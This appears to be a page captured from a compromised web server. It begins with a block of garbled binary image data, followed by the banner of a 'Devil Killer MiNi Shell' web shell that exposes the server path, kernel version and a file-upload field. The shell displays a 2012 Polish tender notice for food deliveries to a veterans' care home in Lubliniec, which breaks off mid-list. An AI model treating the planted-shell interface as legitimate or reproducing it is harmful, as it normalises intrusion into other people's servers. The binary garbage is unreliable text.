JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/112427-N-2012.html

<p class="kh_header"><b>Lubliniec: Sprzedaż wraz z sukcesywną dostawą różnych artykułów spożywczych na rzecz Domu Pomocy Społecznej Dom Kombatanta  im. św. Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr E. Cyrana 10.</b><br>
<b>Numer ogłoszenia: 112427 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Dom Kombatanta" im. św. Rafała Kalinowskiego , ul. Cyrana 10, 42-700 Lubliniec, woj. śląskie, tel. 034 3564004, faks 034 3564192.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna nie mająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z sukcesywną dostawą różnych artykułów spożywczych na rzecz Domu Pomocy Społecznej Dom Kombatanta  im. św. Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr E. Cyrana 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi sprzedaż wraz z sukcesywną dostawą różnych artykułów spożywczych na rzecz Domu Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego z siedzibą w Lublińcu,                              ul. dr E. Cyrana 10. Zakres zamówienia podano w załączniku nr 2 do SIWZ. 
ZADANIE  NR 1			
Cukier	kg	1 kg	2 500
Cukier puder	500g	1 szt	60
Cukier waniliowy	32g	1 szt	150
Kasza kukurydziana gat. I	kg	1 kg	130
Kasza gryczana gat. I	kg	1 kg	100
Kasza jęczmienna gat. I	kg	1 kg	220
Kasza manna gat. I	kg	1 kg	250
Mąka pszenna typ 450 lub 500	kg	1 kg	900
Mąka ziemniaczana	kg	1 kg	300
Mak	kg	1 kg	10
Makaron Czaniec 4-jajeczny (krajanka rosołowa)	250g	1 szt	700
lub równoważny*	 	 	 
Makaron zacierka	kg	1 kg	40
Płatki jęczmienne	kg	1 kg	75
Płatki ryżowe	kg	1 kg	70
Płatki owsiane górskie	kg	1 kg	80
Ryż długoziarnisty gat. I	kg	1 kg	600
Sól	kg	1 kg	600
ZADANIE  NR 2			
Aromat do ciast 	szt	1 szt	10
Chrzan tarty	200g	1 szt	100
Czosnek granulowany	20g	1 szt	400
Cynamon	20g	1 szt	50
Gałka muszkat. miel.	10g	1 szt	20
Herbata	100g	1 szt	1 100
Imbir mielony	15g	1 szt	20
Kakao naturalne ciemne	100g	1 szt	75
Kawa zbożowa 	kg	1 kg	130
Kminek	20g	1 szt	50
Kwasek cytrynowy	50g	1 szt	120
Liść laurowy	8g	1 szt	80
Majeranek	10g	1 szt	150
Majonez dekoracyjny	400ml	1 szt	170
Miód w pudełkach (nie w saszetkach)	25g	1 szt	2 500
Musztarda	190g	1 szt	300
Ocet	0,5l	1 szt	90
Olej	3l	1 szt	50
Olej	1l	1 szt	200
Olej	0,5l	1 szt	60
Papryka słodka	20g	1 szt	300
Pasztet drobiowy PROFI Wielkopolski	131g	1 szt	1 200
lub równoważny*	 	 	 
Przyprawa w płynie typu Maggi	0,96l	1 szt	180
Pieprz czarny mielony	50g	1 szt	200
Pieczywo chrupkie wielozbożowe	180-220g	1 szt	150
Posypka do ciast	szt	1 szt	5
Przyprawa CURRY	szt	1 szt	10
Przyprawa do piernika	szt	1 szt	20
Przyprawa ziarenka smaku	kg	1 kg	100
Sos Tatarski	250g	1 szt	30
Suchary (bez cukru)	290g	1 szt	50
Ziele angielskie op	szt	1 szt	90
Żelatyna	50g	1 szt	200
ZADANIE NR 3			
Jaja L	szt	1 szt	25 000
ZADANIE NR 4			
Barszcz czerwony	5 kg	1 szt	4
Rosół jarzynowy	kg	1 kg	10
Rosół wołowy	kg	1 kg	10
Jarzynka przyprawa uniwersalna	kg	1 kg	40
Przyprawa do kurczaka	kg	1 kg	5
Przyprawa Fix do gulaszu	kg	1 kg	4
Przyprawa do ryb	1,1 kg	1 szt	10
Rosół z kury bulion instant	kg	1 kg	10
Sos bolognese	kg	1 kg	4
Sos de Paris	kg	1 kg	10
Sos pieczeniowy	1,5 kg	1 szt	20
Sos meksykański	kg	1 kg	5
Sos sałatkowy francuski	kg	1 kg	4
Sos ziołowo-czosnkowy	1,5 kg	1 szt	15
Zupa grzybowa	2 kg	1 szt	15
ZADANIE NR 5			
Brzoskwinie (puszki) 	850g	1 szt	6
Dżem 	280g	1 szt	400
Fasola szparagowa konserwowa	500g	1 szt	400
Fasola czerwona konserwowa	400g	1 szt	100
Groszek konserwowy zielony (nie suszony)	400g	1 szt	700
Kompot wiśnia (masa owoców po odcieku min. 400g)	0,9l	1 szt	250
Kompot czarna porzeczka (masa owoców po odcieku min. 400g)	0,9l	1 szt	250
Koncentrat barszczu	300-350 ml	1 szt	50
Koncentrat pomidorowy  	200g	1 szt	150
KOTLIN lub PUDLISZKI  30%		 	
lub równoważny*	 	 	 
Koncentrat pomidorowy 	0,9l	1 szt	130
KOTLIN lub PUDLISZKI  30%		 	
lub równoważny*	 	 	 
Kotlety sojowe	100g	1 szt	50
Ketchup	500g	1 szt	50
Kukurydza konserwowa	400g	1 szt	70
Mandarynki (puszki) 	312g	1 szt	10
Marmolada	400g	1 szt	150
Ogórek konserwowy	900 ml	1 szt	60
Papryka konserwowa	900 ml	1 szt	60
Powidła śliwkowe	400g	1 szt	200
Rodzynki	kg	1 kg	2
Szczaw konserwowy	350g	1 szt	160
Sok owocowy bez cukru	200 ml	1 szt	100
Sok przecierowy marchwiowo-owocowy 	310-330 ml	1 szt	100
bez cukru, typu Kubuś	 	 	 
ZADANIE  NR 6			
Makaron świderki 4-jajeczny 	kg	1 kg	350
Makaron muszelki 4-jajeczny 	kg	1 kg	100
Makaron gwiazdki 4-jajeczny 	kg	1 kg	50.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3, 15.32.00.00-7, 15.33.14.00-1, 15.32.17.00-1, 15.33.14.27-6, 15.33.24.00-8, 15.33.14.62-3, 15.43.10.00-8, 15.41.12.00-4, 15.61.21.00-2, 15.61.41.00-6, 15.83.10.00-2, 15.86.41.00-3, 15.87.12.30-5, 15.87.12.73-8, 15.85.11.00-9, 15.87.12.50-1, 15.87.11.10-8, 15.87.24.00-5, 15.86.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie o spełnianiu warunków udziału w postępowaniu wypełnione i podpisane 
    przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy - załącznik nr 6 do 
    SIWZ;
2. oświadczenie o braku zaległości wobec właściwego Urzędu Skarbowego oraz właściwego   
    oddziału Zakładu Ubezpieczeń Społecznych podpisane przez osoby/ę upoważnione/ą do 
    reprezentowania Wykonawcy - załącznik nr 3 do SIWZ. 
3. Wypełniony i podpisany przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy 
    formularz oferty - według wzoru stanowiącego załącznik nr 1 do SIWZ.
4. Wypełniona i podpisana przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy 
    kalkulacja ofertowa - według wzoru stanowiącego załącznik nr 2 do SIWZ.
5. W przypadku gdy Wykonawca upoważnia do reprezentowania w postępowaniu inną 
     osobę stosowne pełnomocnictwo z wyszczególnieniem zakresu upoważnienia.
6. Wykonawcy mogą wspólnie ubiegać się o zamówienie na zasadach określonych
           w art. 23 ustawy Prawo zamówień publicznych. W takim przypadku oferta musi 
           spełniać następujące warunki:
a)	wraz z ofertą winna być przedłożona kopia umowy lub inny dokument potwierdzający zawarcie konsorcjum/ spółki cywilnej, podpisane przez wszystkich partnerów, przy czym termin, na jaki została zawarta umowa konsorcjum, nie może być krótszy niż termin realizacji zamówienia,
b)	oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela (partnera wiodącego),
c)	upoważnienie do pełnienia funkcji przedstawiciela/partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć je do oferty,
d)	przedstawiciel/partner wiodący winien być upoważniony do zaciągania zobowiązań 
i płatności w imieniu każdego na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu - do oferty należy dołączyć oświadczenie,
e)	podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za nie wykonanie lub nienależyte wykonanie zobowiązań.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo dopuszczenia zmian w umowie w przypadku
      a) wszelkie  zmiany  postanowień  umowy  mogą nastąpić jedynie w zakresie określonym 
          w art. 144 ustawy Prawo zamówień publicznych i wymagają zachowania formy 
          pisemnego aneksu pod rygorem nieważności.
	b) w przypadku zmiany ustawowej stawki VAT strony przewidują możliwość zmiany   
         wynagrodzenia o wysokość podaną w obowiązujących przepisach prawa.
	c) zmiany terminu realizacji umowy.
    d) gdy zmiany będą korzystne dla Zamawiającego i nie będą: 
    - wprowadzone nowe warunki, które gdyby zostały ujęte w ramach procedury 
       przetargowej udzielenie zamówienia uniemożliwiłoby dopuszczenie innych ofert niż ta 
       która została pierwotnie dopuszczona. 
    - modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który
      nie był przewidziany w postanowieniach pierwotnego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lubliniec.starostwo.bip.info.pl/index.php?idmp=335&r=o<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych Warunków Zamówienia można odebrać nieodpłatnie w siedzibie DPS Dom Kombatanta w Lublińcu przy ul. dr E. Cyrana 10, pok. Nr 27 w godz. od 7:00 do 15:00 od pon. do piąt..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 10:45, miejsce: Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego 
             z siedzibą w Lublińcu, ul. dr E. Cyrana 10, sekretariat pok. Nr 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier	kg	1 kg	2 500
Cukier puder	500g	1 szt	60
Cukier waniliowy	32g	1 szt	150
Kasza kukurydziana gat. I	kg	1 kg	130
Kasza gryczana gat. I	kg	1 kg	100
Kasza jęczmienna gat. I	kg	1 kg	220
Kasza manna gat. I	kg	1 kg	250
Mąka pszenna typ 450 lub 500	kg	1 kg	900
Mąka ziemniaczana	kg	1 kg	300
Mak	kg	1 kg	10
Makaron Czaniec 4-jajeczny (krajanka rosołowa)	250g	1 szt	700
lub równoważny*	 	 	 
Makaron zacierka	kg	1 kg	40
Płatki jęczmienne	kg	1 kg	75
Płatki ryżowe	kg	1 kg	70
Płatki owsiane górskie	kg	1 kg	80
Ryż długoziarnisty gat. I	kg	1 kg	600
Sól	kg	1 kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.00.00-2, 15.61.20.00-1, 15.85.11.00-9, 15.61.40.00-5, 15.61.33.80-5, 15.61.10.00-4, 15.87.24.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aromat do ciast 	szt	1 szt	10
Chrzan tarty	200g	1 szt	100
Czosnek granulowany	20g	1 szt	400
Cynamon	20g	1 szt	50
Gałka muszkat. miel.	10g	1 szt	20
Herbata	100g	1 szt	1 100
Imbir mielony	15g	1 szt	20
Kakao naturalne ciemne	100g	1 szt	75
Kawa zbożowa 	kg	1 kg	130
Kminek	20g	1 szt	50
Kwasek cytrynowy	50g	1 szt	120
Liść laurowy	8g	1 szt	80
Majeranek	10g	1 szt	150
Majonez dekoracyjny	400ml	1 szt	170
Miód w pudełkach (nie w saszetkach)	25g	1 szt	2 500
Musztarda	190g	1 szt	300
Ocet	0,5l	1 szt	90
Olej	3l	1 szt	50
Olej	1l	1 szt	200
Olej	0,5l	1 szt	60
Papryka słodka	20g	1 szt	300
Pasztet drobiowy PROFI Wielkopolski	131g	1 szt	1 200
lub równoważny*	 	 	 
Przyprawa w płynie typu Maggi	0,96l	1 szt	180
Pieprz czarny mielony	50g	1 szt	200
Pieczywo chrupkie wielozbożowe	180-220g	1 szt	150
Posypka do ciast	szt	1 szt	5
Przyprawa CURRY	szt	1 szt	10
Przyprawa do piernika	szt	1 szt	20
Przyprawa ziarenka smaku	kg	1 kg	100
Sos Tatarski	250g	1 szt	30
Suchary (bez cukru)	290g	1 szt	50
Ziele angielskie op	szt	1 szt	90
Żelatyna	50g	1 szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.20.00-1, 15.89.40.00-1, 15.86.00.00-4, 15.84.00.00-8, 15.87.12.50-1, 15.87.11.00-5, 15.41.12.00-4, 15.83.16.00-8, 15.81.00.00-9, 15.87.12.00-6, 15.82.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja L	szt	1 szt	25 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz czerwony	5 kg	1 szt	4
Rosół jarzynowy	kg	1 kg	10
Rosół wołowy	kg	1 kg	10
Jarzynka przyprawa uniwersalna	kg	1 kg	40
Przyprawa do kurczaka	kg	1 kg	5
Przyprawa Fix do gulaszu	kg	1 kg	4
Przyprawa do ryb	1,1 kg	1 szt	10
Rosół z kury bulion instant	kg	1 kg	10
Sos bolognese	kg	1 kg	4
Sos de Paris	kg	1 kg	10
Sos pieczeniowy	1,5 kg	1 szt	20
Sos meksykański	kg	1 kg	5
Sos sałatkowy francuski	kg	1 kg	4
Sos ziołowo-czosnkowy	1,5 kg	1 szt	15
Zupa grzybowa	2 kg	1 szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.10.00-0, 15.87.20.00-1, 15.87.12.60-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brzoskwinie (puszki) 
Dżem 
Fasola szparagowa konserwowa
Fasola czerwona konserwowa
Groszek konserwowy zielony (nie suszony)
Kompot wiśnia (masa owoców po odcieku min. 400g)
Kompot czarna porzeczka (masa owoców po odcieku min. 400g)
Koncentrat barszczu
Koncentrat pomidorowy  
KOTLIN lub PUDLISZKI  30%
lub równoważny*
Koncentrat pomidorowy 
KOTLIN lub PUDLISZKI  30%
lub równoważny*
Kotlety sojowe
Ketchup
Kukurydza konserwowa
Mandarynki (puszki) 
Marmolada
Ogórek konserwowy
Papryka konserwowa
Powidła śliwkowe
Rodzynki
Szczaw konserwowy
Sok owocowy bez cukru
Sok przecierowy marchwiowo-owocowy 
